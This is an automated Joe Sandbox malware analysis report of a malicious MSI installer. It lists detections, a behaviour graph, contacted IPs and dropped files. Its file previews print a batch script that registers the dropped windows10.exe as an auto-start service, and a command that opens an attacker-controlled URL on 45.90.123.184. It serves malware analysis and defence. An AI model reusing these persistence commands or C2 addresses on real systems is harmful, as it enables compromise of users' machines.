            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467456 Sample: hBqTrQLya4.msi Startdate: 04/07/2024 Architecture: WINDOWS Score: 84 69 Multi AV Scanner detection for domain / URL 2->69 71 Multi AV Scanner detection for dropped file 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 2 other signatures 2->75 8 msiexec.exe 51 54 2->8         started        12 cmd.exe 13 2->12         started        14 cmd.exe 1 2->14         started        16 msiexec.exe 3 2->16         started        process3 file4 53 C:\Windows\Installer\MSIDD92.tmp, PE32 8->53 dropped 55 C:\Windows\Installer\MSIDD62.tmp, PE32 8->55 dropped 57 C:\Windows\Installer\MSID7D3.tmp, PE32 8->57 dropped 59 6 other malicious files 8->59 dropped 85 Drops executables to the windows directory (C:\Windows) and starts them 8->85 18 windows10.exe 8->18         started        21 msiexec.exe 8->21         started        23 MSIDD62.tmp 8->23         started        25 MSIDD92.tmp 8->25         started        27 chrome.exe 12->27         started        30 conhost.exe 12->30         started        32 conhost.exe 14->32         started        34 sc.exe 1 14->34         started        36 sc.exe 1 14->36         started        signatures5 process6 dnsIp7 77 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 18->77 79 Switches to a custom stack to bypass stack traces 18->79 38 windows10.exe 18->38         started        41 windows10.exe 18->41         started        43 windows10.exe 18->43         started        48 2 other processes 18->48 61 192.168.2.7, 123, 138, 443 unknown unknown 27->61 63 239.255.255.250 unknown Reserved 27->63 45 chrome.exe 27->45         started        signatures8 process9 dnsIp10 83 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 38->83 50 windows10.exe 38->50         started        65 www.google.com 142.250.186.132, 443, 49712, 49723 GOOGLEUS United States 45->65 67 45.90.123.184, 49702, 49703, 80 DEDIPATH-LLCUS Germany 45->67 signatures11 process12 signatures13 81 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 50->81

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            hBqTrQLya4.msi32%ReversingLabsWin32.Trojan.Generic
            hBqTrQLya4.msi7%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll50%ReversingLabs
            C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll43%VirustotalBrowse
            C:\Users\user\Pictures\fotosdaviagem\windows10.exe3%ReversingLabs
            C:\Users\user\Pictures\fotosdaviagem\windows10.exe5%VirustotalBrowse
            C:\Windows\Installer\MSID686.tmp0%ReversingLabs
            C:\Windows\Installer\MSID686.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSID6F5.tmp0%ReversingLabs
            C:\Windows\Installer\MSID6F5.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSID754.tmp0%ReversingLabs
            C:\Windows\Installer\MSID754.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSID783.tmp0%ReversingLabs
            C:\Windows\Installer\MSID783.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSID7D3.tmp0%ReversingLabs
            C:\Windows\Installer\MSID7D3.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSIDD62.tmp0%ReversingLabs
            C:\Windows\Installer\MSIDD62.tmp0%VirustotalBrowse
            C:\Windows\Installer\MSIDD92.tmp0%ReversingLabs
            C:\Windows\Installer\MSIDD92.tmp0%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.google.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://45.90.123.184/favicon.ico0%Avira URL Cloudsafe
            http://www.audio-tool.net0%Avira URL Cloudsafe
            http://ip-api.com/json/0%Avira URL Cloudsafe
            https://pastebin.com/raw/tBXs1wCj0%Avira URL Cloudsafe
            http://www.indyproject.org/0%Avira URL Cloudsafe
            http://ip-api.com/json/0%VirustotalBrowse
            http://www.indyproject.org/0%VirustotalBrowse
            https://pastebin.com/raw/tBXs1wCj1%VirustotalBrowse
            http://www.audio-tool.net5%VirustotalBrowse
            http://45.90.123.184/favicon.ico8%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.google.com
            		142.250.186.132
            		truefalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://45.90.123.184/favicon.icofalse
            • 8%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://45.90.123.184/clientes/inspecionando.phpfalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://pastebin.com/raw/tBXs1wCjwindows10.exe, 00000020.00000002.2679332883.0000000004D48000.00000004.00001000.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.audio-tool.netwindows10.exe, 0000000E.00000000.1282464047.0000000000497000.00000002.00000001.01000000.00000006.sdmpfalse
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.indyproject.org/windows10.exe, 00000020.00000003.1624320924.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2679332883.0000000004C6C000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://ip-api.com/json/windows10.exe, 00000020.00000003.1624320924.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              239.255.255.250
              		unknownReserved
              		unknownunknownfalse
              142.250.186.132
              		www.google.comUnited States
              		15169GOOGLEUSfalse
              45.90.123.184
              		unknownGermany
              		35913DEDIPATH-LLCUSfalse

              Private

              IP
              192.168.2.7

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1467456
              Start date and time:2024-07-04 09:12:15 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 45s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:37
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:hBqTrQLya4.msi
              renamed because original name is a hash value
              Original Sample Name:29772a95fb3ed50319dc74f8be52963ee621dc151ccd94b10ea14a7123c268f7.msi
              Detection:MAL
              Classification:mal84.evad.winMSI@44/35@2/4
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 82%
              • Number of executed functions: 54
              • Number of non-executed functions: 310
              Cookbook Comments:
              • Found application associated with file extension: .msi

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.185.110, 108.177.15.84, 34.104.35.123, 87.248.205.0, 216.58.206.35, 87.248.204.0
              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              239.255.255.250https://worldofprocure.com/worldofprocure.rarGet hashmaliciousUnknownBrowse
                https://www.qcc.com/web/cms/overseaApply?opsriskcountry=%E7%BE%8E%E5%9B%BD&ip=155.190.35.6&back=%2Fweblogin%3Fback%3D%2Ffirm%2F1ef8635d382a741aaca689243a486673.htmlGet hashmaliciousUnknownBrowse
                  file.exeGet hashmaliciousUnknownBrowse
                    https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20=Get hashmaliciousUnknownBrowse
                      https://we.tl/t-dQx6fJKslTGet hashmaliciousUnknownBrowse
                        http://sites.google.com/view/terramininghseq/inductions/binduli-and-goldfields-inductionGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                            https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fyourremittance.com.au%2ft%2fs%2fUD5xw4r&umid=cc04381d-8482-4529-83d6-e97329962ac3&auth=3a5566c60b1f4d8525fa8ab109f94675a663eb25-bbc82991079aa7c5d0d2ec918ad27ef8f965c70aGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousUnknownBrowse
                                https://cdn.polyfill.io/Get hashmaliciousUnknownBrowse
                                  45.90.123.184CrzA2u67LQ.msiGet hashmaliciousUnknownBrowse

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    DEDIPATH-LLCUSPlata SWIFT 96127411.xlsGet hashmaliciousRemcosBrowse
                                    • 103.124.107.228
                                    bn.jarGet hashmaliciousUnknownBrowse
                                    • 185.255.114.28
                                    https://thetechglitch.com/Get hashmaliciousUnknownBrowse
                                    • 45.141.122.239
                                    5klOcqqL2D.elfGet hashmaliciousMiraiBrowse
                                    • 161.8.26.215
                                    skid.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 45.12.142.171
                                    CrzA2u67LQ.msiGet hashmaliciousUnknownBrowse
                                    • 45.90.123.184
                                    UyWmCsMy4T.elfGet hashmaliciousMiraiBrowse
                                    • 45.12.141.82
                                    lustsorelfar.exeGet hashmaliciousUnknownBrowse
                                    • 45.14.194.253
                                    lustsorelfar.exeGet hashmaliciousUnknownBrowse
                                    • 45.14.194.253
                                    SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                    • 185.228.19.37

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    28a2c9bd18a11de089ef85a160da29e4https://www.qcc.com/web/cms/overseaApply?opsriskcountry=%E7%BE%8E%E5%9B%BD&ip=155.190.35.6&back=%2Fweblogin%3Fback%3D%2Ffirm%2F1ef8635d382a741aaca689243a486673.htmlGet hashmaliciousUnknownBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20=Get hashmaliciousUnknownBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fyourremittance.com.au%2ft%2fs%2fUD5xw4r&umid=cc04381d-8482-4529-83d6-e97329962ac3&auth=3a5566c60b1f4d8525fa8ab109f94675a663eb25-bbc82991079aa7c5d0d2ec918ad27ef8f965c70aGet hashmaliciousUnknownBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    https://cdn.polyfill.io/Get hashmaliciousUnknownBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    https://googie-anaiytics.comGet hashmaliciousUnknownBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    https://promoboxxinc-my.sharepoint.com/:o:/g/personal/mark_ruthfield_promoboxx_com/EhhP0_qQ-pRNnHIIvk85j7YBGabYCjE3lQP2M5rir-Tkwg?e=5%3a9mx4QX&at=9&xsdata=MDV8MDJ8YWNoYW50bGVyQHNldmVuLmNvbS5hdXxhYjcxZTkyMmVhZWM0NzA2OWUyMDA4ZGM5YmNjN2EyNHxiMzU5MjkxMjQxNTU0Mzk5Yjc5MDc1MmM4OTRkMjkzNXwwfDB8NjM4NTU2NTQ5NzMyMDQ2Nzk5fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=MVpGSnd1NWxrcmZ3SkpKc0RENHZCWFQvVTVHTTJSUWlFQXdUaGZONlRuYz0%3dGet hashmaliciousHTMLPhisherBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 2.19.104.72
                                    • 40.68.123.157
                                    • 52.165.165.26

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\Pictures\fotosdaviagem\windows10.exeNF_e_07_2024_XML__.msiGet hashmaliciousUnknownBrowse
                                      CrzA2u67LQ.msiGet hashmaliciousUnknownBrowse
                                        z1Pedido-Faturado-NF-938731.cmdGet hashmaliciousUnknownBrowse
                                          arquivo.msiGet hashmaliciousUnknownBrowse
                                            z1Intimacao-eletronica.msiGet hashmaliciousUnknownBrowse
                                              Nota.msiGet hashmaliciousUnknownBrowse
                                                C:\Windows\Installer\MSID686.tmpCrzA2u67LQ.msiGet hashmaliciousUnknownBrowse
                                                  HomeDesk.msiGet hashmaliciousUnknownBrowse
                                                    z1Pedido-Faturado-NF-938731.cmdGet hashmaliciousUnknownBrowse
                                                      arquivo.msiGet hashmaliciousUnknownBrowse
                                                        25690.01808D.msiGet hashmaliciousUnknownBrowse
                                                          fatKCMAGKKH.msiGet hashmaliciousUnknownBrowse
                                                            SPMServer_2024.3.5.473.exeGet hashmaliciousUnknownBrowse
                                                              SPMServer_2024.2.1.7.exeGet hashmaliciousUnknownBrowse
                                                                SPMServer_2024.3.1.22.exeGet hashmaliciousUnknownBrowse
                                                                  Df.mes-25664.msiGet hashmaliciousUnknownBrowse

                                                                    Created / dropped Files

                                                                    C:\Config.Msi\49d149.rbs

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):9582
                                                                    Entropy (8bit):5.549730100561323
                                                                    Encrypted:false
                                                                    SSDEEP:96:QwnCAAQlZ/RdLc3Yl6MoJmlRERT4g5HN+1pd+raR9mK2TUdBFjQbLe5ubi8I8Kw1:Q8CfqdOCetZ2fHkEodiMH
                                                                    MD5:C1E4C37FD8D757BB1AC90AD449E3C483
                                                                    SHA1:46B939B2DF15A5318BD72608DD1D03AEE792C6CC
                                                                    SHA-256:1DF09731DED4FDC2F1FF39E88CB1A7CB5661CBC02144FCF7A51F8B9F873BE904
                                                                    SHA-512:0F7190C3F16BF6846CCF5B64E0EB7795A07D3183951C632CE14AA22F0FAB82C5890A5F53336C219D857B8CBB9014BADA3C5018B17A09C920F29C9027F9BAD57E
                                                                    Malicious:false
                                                                    Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}..Aplicativo Windows..hBqTrQLya4.msi.@.....@?....@.....@........&.{32FF458D-4EB8-49EA-9D5C-9471CB31AE21}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{4669957E-4874-4408-AF9D-19502B394F45}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{7FA89396-444D-4152-8B48-A5E58414D67B}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{1A182076-3D9

                                                                    C:\Users\user\AppData\Local\Temp\MSI9cfef.LOG

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):249926
                                                                    Entropy (8bit):3.803039078905188
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yxqvZFe7Iq/8z8VDh5SYVQheG6Wr5vbpRYpJhJa2pQt2xp/RPHBK2Pp3pRpMWpP8:qI+QBZVjacxlV86xncpRj4ICWZW
                                                                    MD5:921AC580EF1AB59F47321CEE17A646B2
                                                                    SHA1:040BFB4B6C7CACFAD17B7B1ADE6D6A4441808186
                                                                    SHA-256:517CA669EC5BF920E14682FD95D27A19869182008CCAC4656689142BD7A9BD82
                                                                    SHA-512:27539AB4039131B8383AEDEC5964B4445A9E63B1C7CA2B37829F3762980093C2FF4464B4735D23E5EB5503E39167FCEF7FEB2E53201465BB57C1AF2A360BD99A
                                                                    Malicious:false
                                                                    Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.4./.0.7./.2.0.2.4. . .0.3.:.1.3.:.0.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.4.0.:.7.8.). .[.0.3.:.1.3.:.0.7.:.7.9.5.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.4.0.:.7.8.). .[.0.3.:.1.3.:.0.7.:.7.9.5.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.4.0.:.4.0.). .[.0.3.:.1.3.:.0.7.:.8.4.2.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.4.0.:.4.0.). .[.0.3.:.1.3.:.0.7.:.8.4.2.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .

                                                                    C:\Users\user\Documents\Windows10.cmd

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):196
                                                                    Entropy (8bit):4.891201943788933
                                                                    Encrypted:false
                                                                    SSDEEP:3:mKDDktbrXj18BIDQK1ERNLw2ABOA53kfNINAgAEFWREX6EEDQobhL3T18BQQUT+:hwFDJRku4NfIOc/Q3RVPRbj5QZ
                                                                    MD5:1951A22DD00589B9D64F27075C96188B
                                                                    SHA1:4CBEDB39A682D217EA63693346D337E032B85A28
                                                                    SHA-256:F1560195A61B8DFB6FDCA79B328F2D221187EFA8932DC9A4232C317BF8151292
                                                                    SHA-512:41E39FEE27A854C0F68CC70633F4CF51131E5EB15CE693DB3E6CA90321E32B836E9497A111965AB20B65BFBF68CF5CCEB28D14073EBB2DBA7D1C9258BC55E084
                                                                    Malicious:false
                                                                    Preview:@echo off..REM --- Criar o servi.o ---..sc create MeuServico binPath= "%USERPROFILE%\Pictures\fotosdaviagem\windows10.exe" start= auto..REM --- Iniciar o servi.o ---..sc start MeuServico....exit

                                                                    C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):13055488
                                                                    Entropy (8bit):7.959489535522271
                                                                    Encrypted:false
                                                                    SSDEEP:196608:SAoi2diILpItfMCl5gZrcAh8yIFYGUeCnNOSunnTDt0qZ5nRHT4Aw7oMPsl5+4f9:nqEtfnFVDcIDnHD5RH8rJPA5f1
                                                                    MD5:1120F08674501BA801FC27AB40E4A25E
                                                                    SHA1:6E98C6ACAF47875996743A787CF763E163926C60
                                                                    SHA-256:55EFA31F8FCC414F08CB0B2F3598C05896315F956F1ECB7C61908A0B60100949
                                                                    SHA-512:795C58DA3CBE8944B086BDEB369978C9899E4AA924A9F7B10801E184005A581D84D0AF14DFA0917BE81D0BE05CA0B3684C9909D228ECD788BA858D316E0D4D01
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                    • Antivirus: Virustotal, Detection: 43%, Browse
                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....FQd..................-..........T........-...@...........................g.....................................h..&-...........f.......................f......................................................................................text.....-......................... ..`.itext........-..................... ..`.data....x....-.....................@....bss.....X...@...........................idata..`8..........................@....didata.l...........................@....edata..&-..........................@..@.rdata..E.... /.....................@..@.ri$....rbp..0/..................... ..`.)5y................................@....kC0.....!.......".................. ..`.rsrc.........f......(..............@..@.reloc........f.....................@..B..................... 4......n3.............@..@........................................................

                                                                    C:\Users\user\Pictures\fotosdaviagem\cdburner.md

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16156854
                                                                    Entropy (8bit):7.999987454770361
                                                                    Encrypted:true
                                                                    SSDEEP:393216:b3jVMSUmx4twho2HfoWAN+d+Gstcdq5Z92/72X4o/o:LjGo4tMfFItcUn92xo/o
                                                                    MD5:697FF336A8F1278BEBD9FA3358BAE2BA
                                                                    SHA1:39514D8961C976B25E803A8EDF65AF1928D2CD2E
                                                                    SHA-256:918DE41CB24F5BE5A473B2D0881FEE5D56869640742F37466CBCAF5FD154E9CE
                                                                    SHA-512:32F943FEA634E6FB0C0B2D4E934FC671838611CEB9068840C6E7CE99036E06BE94E88B38256AC57729DF1983E0B5DC1474F7458CA32EF371B0D84077656FBDAF
                                                                    Malicious:false
                                                                    Preview:r/.fn...W.k........W.&r..r}.....B.N......N8..#.%..s..\A?.(am.|..x).....=.3}SzIU..9.R...Q.V....'.f-^..@..... .e\l7..[%.]r..N\....9.z.V...}o....I.....?B......e%.=...x.@..+U..4.U..R...j(b..9...C.o.#U.w..U!F.18......M]......D..*'Zx....n3.....Ql..U=B..,..q/..0mC...~..n....:..4. /.@.$...q|..>.fd3.u.E.X..I.........T.............s@..[/f.x:^..F*..?.).}pnx._..=...n......J..{x7...Z!F.hat....@4g.<..!=..Q9..F.E5...V~.B.1$...\.``=....;A...#.ab.3#ZA%.....S.<".@@T(@H.0.a..G`B..o..{$a1.%_......x.Q..)C....^.r..%i.,O\r..#...a.p....<...N...!6.4.r..Is.W.(..:6..........St..(..%...C..f`ZR..+.zK....."d..FwL..TR...]8.9...3.HX>;@m.v&+'.....r.)*...`n.Z...."..7;.N........wJ.*1....g..........V."....(7u.M..,o..z.R.&..w.v4.U./..V.b.\.o.z.M.i7.L.e...,U.S+.v6.P...`.w .PB.f.......j..,.:.C\...Fc..:...`:=.X......26.......G^..l.`..f.....[...x...6...v....Y.c..M.U..]k..1..).&...@...].bf.....@. .pZ.0.(.}...k...1.....:.d]L../.~.V>|qQ..t.5.>I#..>....<l...g..@]...k9kF.,!.."%h...z

                                                                    C:\Users\user\Pictures\fotosdaviagem\cdburnerConnect

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):54
                                                                    Entropy (8bit):5.245447224305563
                                                                    Encrypted:false
                                                                    SSDEEP:3:3ugfKvpkPxBKS9Gr236TOf:+giveJr9Upg
                                                                    MD5:51C2C6285991EF6126010B102782B43D
                                                                    SHA1:9CAEC981404A3BAD4536CB42DE557EB1CFECB085
                                                                    SHA-256:3692E5F68D8F5D3A8A3782FAAC232D89C74E37ED8E9EF2853AEE0147E4D2659C
                                                                    SHA-512:9C99EE675E9D3F9320DEFF79F23B062B2E563C5E1824089DA4825F25E8F8A87E0E870758EDAA4610C78F850EA2355886CE5F30DE51C1536F8713E9045999D48E
                                                                    Malicious:false
                                                                    Preview:jn8r4IjEzoJLa1cjTx5vc2C9Sk3Ff7+76/nuToKOtShN..oKPv+W/D

                                                                    C:\Users\user\Pictures\fotosdaviagem\cont.cmd

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):53
                                                                    Entropy (8bit):4.461516388926147
                                                                    Encrypted:false
                                                                    SSDEEP:3:jhRFLVUdxyVY1QVn:jHFydxyVY1QV
                                                                    MD5:79F4017D8256FDFB1D7FA719A0CB4771
                                                                    SHA1:73ACD3CC6353ECFF615BB8BE2FB1B8D28BD0BF12
                                                                    SHA-256:BDAA787D67F8B4B80B1D271C2D6AB4D6ACC1C05DF309D5EFDDFB3D0D4DB93A0F
                                                                    SHA-512:350ED557950074CAD51412D05D755771137BBC83400B1C28997559F6023F91B0A3C953E6B6E52BB6264566AD078AA0B3A0B41B3D3CAF9745513156138CB61E5B
                                                                    Malicious:false
                                                                    Preview:Start http://45.90.123.184/clientes/inspecionando.php

                                                                    C:\Users\user\Pictures\fotosdaviagem\settings.xml

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1793
                                                                    Entropy (8bit):7.888051089019235
                                                                    Encrypted:false
                                                                    SSDEEP:48:PCSBPCF4qYtOIt9Oxi0/1YapmAg7VZNPVs:PvCFxYzmxN3mAYNS
                                                                    MD5:FEBE516EE835A50D940B2413596527C4
                                                                    SHA1:E38B8178C37973A7E43F1EE183F08FCFFFAEC5AC
                                                                    SHA-256:2E62CCA2526CD1355D85F607DCD274F05C808DB6AD9FCA42DC9371A30DB52652
                                                                    SHA-512:C719989A043475CFC1CDF3EBAE5E27DC721F025279F7EB3F3E1FA52D1A0F440214F77986EC4D18BFE1FFC6905C512198DBA0A0299D1FE7EDA66BD0E7205E772F
                                                                    Malicious:false
